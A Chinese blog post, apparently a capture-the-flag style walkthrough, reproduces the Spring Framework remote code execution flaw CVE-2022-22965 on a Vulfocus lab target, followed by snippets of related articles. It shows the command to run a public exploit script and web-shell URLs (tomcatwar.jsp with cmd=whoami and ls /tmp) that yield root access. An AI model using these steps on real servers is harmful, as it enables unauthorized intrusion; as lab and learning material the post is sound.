Spring Framework远程代码执行漏洞_CVE-2022-22965复现

已于 2024-05-13 15:18:37 修改
阅读量3.8k 收藏 2
点赞数
文章标签: web安全
于 2022-04-07 13:38:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beichenyyds/article/details/124014233
版权
本文介绍了Spring Framework的一个远程代码执行漏洞,该漏洞影响JDK9及以上版本的特定Spring Core和Spring Boot版本。攻击者可以利用此漏洞在受影响的系统上执行恶意代码。复现步骤包括使用Vulfocus靶场、下载开源EXP文件并进行测试,最终获取shell权限并找到flag。建议受影响的用户尽快升级到安全版本。
摘要由CSDN通过智能技术生成

1. 漏洞介绍

Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。

2、受影响版本

  • Spring Core <= 5.2.19, <= 5.3.17
  • Spring Boot <= 2.6.5

3、利用前提

  • JDK 9 及以上版本
  • Spring框架的5.3.0至5.3.17、5.2.0至5.2.19版本,以及旧版本
  • Tomcat服务器

4.漏洞复现

1.打开vulfocus靶场环境,输入访问地址进入之后为以下 ok

2,接下来下载github上的开源exp文件

https://github.com/craig/SpringCore0day

3.下载好之后在下载好的文件内打开终端 输入以上访问地址来检测

python3 exp.py --url http://123.58.236.76:43269/

4.检测发现漏洞存在并附上url地址访问

漏洞存在,shell地址为:http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=whoami

5.访问已经是root权限,flag在tmp文件下

6.直接输入文件下tmp位置即可得到flag

http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=ls%20/tmp

即可通关

beichenyyds
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
做自己喜欢的事,并将其发挥到极致!
04-07 1469
文章目录声明前言一、漏洞详情二、影响版本三、漏洞复现四、漏洞原理分析五、修复方法(仅供参考) 声明 本文章仅用做漏洞复现和技术研究,切勿非法渗透攻击,造成一切后果与本作者无关,切记! 前言 Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。 一、漏洞详情 Spring Framework 是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为J2EE应用程序开发提供一个好用的框架。 这个漏洞的主要原因是在JDK 9+版本
Spring RCE远程执行漏洞CVE-2022-22965
tpaer的博客
10-18 2578
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞
Spring Framework CVE-2022-22965漏洞详细分析
HBohan的博客
04-18 1993
一. 漏洞利用条件 jdk9+ Spring 及其衍生框架 使用tomcat部署spring项目 使用了POJO参数绑定 Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本 二. 漏洞分析 一开始复现这个漏洞的时候,听其他师傅说是一个老漏洞CVE-2010-1266的绕过,之前也没调试过这个漏洞,看了些分析文章后,大概明白是对Spring中的bean的漏洞利用,通过API Introspector. getBeanInfo 可以获取到PO
spring framework漏洞复现
m0_56135391的博客
04-12 1786
1.在vulfocus平台启动spring framework漏洞环境 2.使用安装有python3环境的机器对该靶场进行漏洞验证,此处使用kali进行攻击,命令为python3 poc文件 -- url 目标地址3.漏洞验证 poc(python文件) #coding:utf-8 import requests import argparse from urllib.parse import urljoin def Exploit(url): headers = {"suffix":"%
Spring Framework JDK >= 9 远程代码执行漏洞CVE-2022-22965
最新发布
Flag少侠的博客
07-15 9458
打开靶场什么都没有网上查找到了 Poctry:print(e)passExploit(i)main()requests: 用于发送HTTP请求。argparse: 用于解析命令行参数。urljoin: 用于将基础URL与相对路径组合成一个完整的URL。headers: 设置HTTP请求头。suffix: 指定生成的JSP文件的结束标记。c1和c2: 替换变量,用于在请求数据中插入Runtime和
Spring Framework远程代码执行漏洞(CVE-2022-22965)
热门推荐
chaojixiaojingang
04-06 1万+
1.漏洞描述 由于Spring处理流程存在缺陷,在JDK9及以上版本的Spring框架环境中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并注入恶意字段值,触发pipeline机制,从而在任意路径下写入文件。远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2.影响版本 JDK >= 9 & 5.3.X < Spring Framework < 5.3.18 JDK >= 9 & 5.2.X ...
【vulhub系列】CVE-2022-22965 Spring Framework远程代码执行漏洞复现
Wiofgb的博客
08-12 1769
记录一次CVE-2022-22965 Spring Framework远程代码执行漏洞复现
Spring Framework远程代码执行漏洞
m0_71745903的博客
01-11 717
2022年3月30日,国家信息安全漏洞共享平台(CNVD)发布了Spring框架远程命令执行漏洞(攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,此漏洞POC、技术细节及EXP已大范围公开,此漏洞影响范围极大。目前Spring官方已发布补丁修复该漏洞,强烈建议Spring框架用户立即更新至最新版本。
使用Spring Framework构建的应用程序面临严重缺陷
womenjiademao的博客
09-12 311
Spring框架,是用于开发Java Web的应用程序的。最近,其开发人员修补了三个漏洞,其中包括可用于远程代码执行的关键漏洞。 105.png 最严重的缺陷位于spring-messaging模块,它允许应用程序通过内存中的STOMP代理在WebSocket端点上公开STOMP(简单文本导向消息传递协议)。攻击者可以通过向代理发送特制的消息,利用该问题来获取远程代码执行。 该漏洞被命名...
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947)
web_15534274656的博客
09-11 733
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
spring framework远程代码执行漏洞复现(CNVD-2022-23942 CVE-2022-22965
yang1234567898的博客
04-18 7064
3 月 30 日,国家信息安全漏洞共享平台(CNVD)接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞(CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。CNVD 对该漏洞的综合评级为“高危”。 漏洞影响: JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..
CVE-2022-22965漏洞复现
Foreverlove112的博客
10-01 455
CVE-2022-22965漏洞复现
Spring Framework远程代码执行漏洞CVE-2022-22965
qq_50854662的博客
06-27 1019
Spring Framework远程代码执行漏洞CVE-2022-22965
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5603
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3160
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
CVE-2022-22965 漏洞复现
Ethan_cfq的博客
04-13 175
执行格式 :python3 Spring_vulhub_CVE-2022-22965_poc.py --url=url:pro。此时已将tomcat的日志存储位置已修改为:tomcatwar.jsp,此文件是小马文件,可执行远程命令。拉取cve-2022-22965环境(vulhub拉去环境并打开漏洞环境)在靶场环境搭建可访问的情况下,运行python文件,可直接进行远程命令执行。此时我们可以正常访问页面,说明我们的靶场环境可以使用。访问靶场环境是否可正常访问。此时,手工漏洞复现结束。
CVE-2022-22965 Spring Framework远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-14 3104
springframeworkspring 里面的一个基础开源框架,主要用于javaee的企业开发。Spring是什么呢?首先它是一个开源的项目,而且非常活跃;它是一个基于IOC和AOP的构架多层j2ee系统的框架,但它不强迫你必须在每一层中必须使用Spring,因为它模块化的很好,允许你根据自己的需要选择使用它的某一个模块;
漏洞复现CVE-2022-22965 Spring Framework远程代码执行漏洞
m0_53121608的博客
07-16 217
服务启动后,访问http://your-ip:8080/?name=Steve&age=25即可看到一个演示页面。
Gitea Git Fetch 远程代码执行漏洞 (CVE-2022-30781)
"CVE-2022-30781是针对Gitea开源Git服务的一个远程代码执行漏洞,由samguy发现。该漏洞存在于Gitea的1.16.6及以下版本中,允许攻击者通过Git fetch命令在迁移仓库过程中执行任意系统命令。该漏洞在Linux-Debian上被...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值